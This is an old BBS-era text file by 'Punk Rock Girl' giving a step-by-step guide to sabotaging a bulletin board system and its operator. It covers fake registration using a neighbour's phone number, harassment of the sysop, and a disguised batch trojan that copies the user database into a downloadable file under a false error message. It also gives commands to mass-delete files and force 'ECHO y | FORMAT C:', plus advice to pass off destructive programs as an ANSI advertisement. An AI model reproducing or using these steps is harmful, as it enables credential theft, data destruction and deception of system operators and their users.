How To Kill A Stupid BBS and drive the SysOp Crazy

A random pile of trash spewed out by Punk Rock Girl for you to 
decipher...




Lets talk about your local BBS. Is it one of those place that
boasts of having the best files and the most wonderful message
subs in the world? Good, that means its run by a 14 year old
little twit and it more than likely SUCKS!
What can you do to protect yourself from invasion of the retards?
Well its really simple. You can destroy their computer with a
sledge hammer or you can drive them crazy and make them leave.

Step One:
  First thing you need to do is pretend to be one of the mindless
modem pigs and call them up. Log in as new and use REAL
information. If everything goes good it wont matter if they have
your info since they wont be around very long anyway. 
  If the SysOp makes you leave feedback to him then just say the
usual crap about how you got the number from some BBS list they
plastered their name all over and how you think that they are the
neatest thing to happen since tampons.
  Now you need to look around the BBS. You probably wont have
access to anything because the SysOp is a paranoid little phoebe
and only lets you log off or leave mail to him. Hang up.
  If the guy calls you and voice-validates you then tell him your
house is on fire and you can't talk to him ( you should tell this
to everybody on the phone.) Now you are valid on the stupid BBS
and you can look around.
  Call it and do the following. Look at all his message subs and
file areas, look at the user list, and look at what doors he has.
Now for the fun part.
  You need to get the name of a kid who is never at HIS house.
Some person who is always hanging around at the neighbors house
or something. Lets say his name is Dustin ( what a stupid name!)
Now you need to get your neighbors phone number. 
  Log into the BBS as new. When it asks your name say Dustin.
When it asks you number just say the number of the people Dustin
hangs out with all the time. In the feedback ( or letter you send
him anyway ) tell him you are at school for 700 hours a day and
that you are home from 5:00pm to about 6:00am.  Now when the
little sysop calls to voice validate him they will say "No sorry
he is not here right now" he'll just think that you are hard to
reach, not that you don't exist.
  If you have a better plan then by all means use it, this is
just an idea for you `brain impaired' people who are reading
this.
  Now you have a FAKE account to hack and trash the goober BBS
with. 

Step Two:
  Drive the sysop crazy. Leave him letters ALL the time about how
your file credits are going down and you can't download anything.
Tell him when you log in it says that there is no time left and
it logs you off. Go to the message subs and post way off topic,
talk about your vacation or something. Remember that this is a
fake account so you can make up fun stuff about how you have
syphilis. 
  Now to the doors section. If this guy has such a great BBS he
must have something really good online. All the better to wreck
things with. Use every door 70000000 times a day and keep getting
new accounts every time, fighting with everybody, ALT-H in the
middle of the game...
  Most of the people who run doors must run them through BATCH
files. Abort the batch file, sometimes fun stuff happens. Mostly
you get to see some path names from DOS. 
  Just remember the name of the directory his BBS is in. Now
upload him a trojan horse to kill everything in that directory.
Something even more creative would be to copy the USER.SL2
STRING.TXT  USER.FIL   whatever... to a directory where you can
download it. Take for instance the fact that he has a file called
K-RAD.ZIP in a directory called misc, available for download. All
you gotta do is copy his user file into the same directory as K-
RAD.ZIP and call it K-RAD.ZIP! Now you can download his user
file! All you gotta do is upload him a program that says this 
(theoretically) :
@ECHO OFF
COPY C:\BBS\USER.DAT C:\BBS\MISC\K-RAD.ZIP>nul
echo Incorrect DOS Version
That's just stupid batch file, but if you have a brain you can 
write this into a program in .3 seconds so it looks more like
something the SysOp will want to run. Now just call and download
K-RAD.ZIP
Then upload PROGRAM1.EXE to him, then PROGRAM2.EXE.
TA DA!

Log in as anybody you want or just log in as the sysop and play
with his DOS. 
Things to do in dos would include:
Delete everyfile on his hard drive directory by directory, DONT
say *.*, any question DOS asks that requires a yes or no answer
will not let a remote user answer. You should just say DEL *.exe
and then DEL *.COM and then... etc until they are all dead. Now
you need to go to the root directory and remove the directories.
But wait he can still use UNDELETE! You need to run PROGRAM1.EXE
right now.

Just format the stupid thing. How to do it without getting hung
up on? Simple type this EXACTLY!

ECHO y | FORMAT C:

That should work... dont get your hopes up.

If you dont wanna take any chances then just run PROGRAM2.EXE and
watch everything DIE!

Oh yeah, after you run program2 I wouldn't run anything from a
BBS... EVER again... heeheeheeheeheehee ( assuming his computer
still works )

Method Three:

Upload the file PROGRAM3.COM to the sysop. Tell him its a great
new ANSI advertisement for his BBS! If he is stupid he will run
it. Once again, dont run anything you get from him... or anyone
who gets anything off his computer. HAHAHAHAHAHAH!!!

That's the end. I hope you put this file to good use. Bye.

                                   Punk Rock Girl
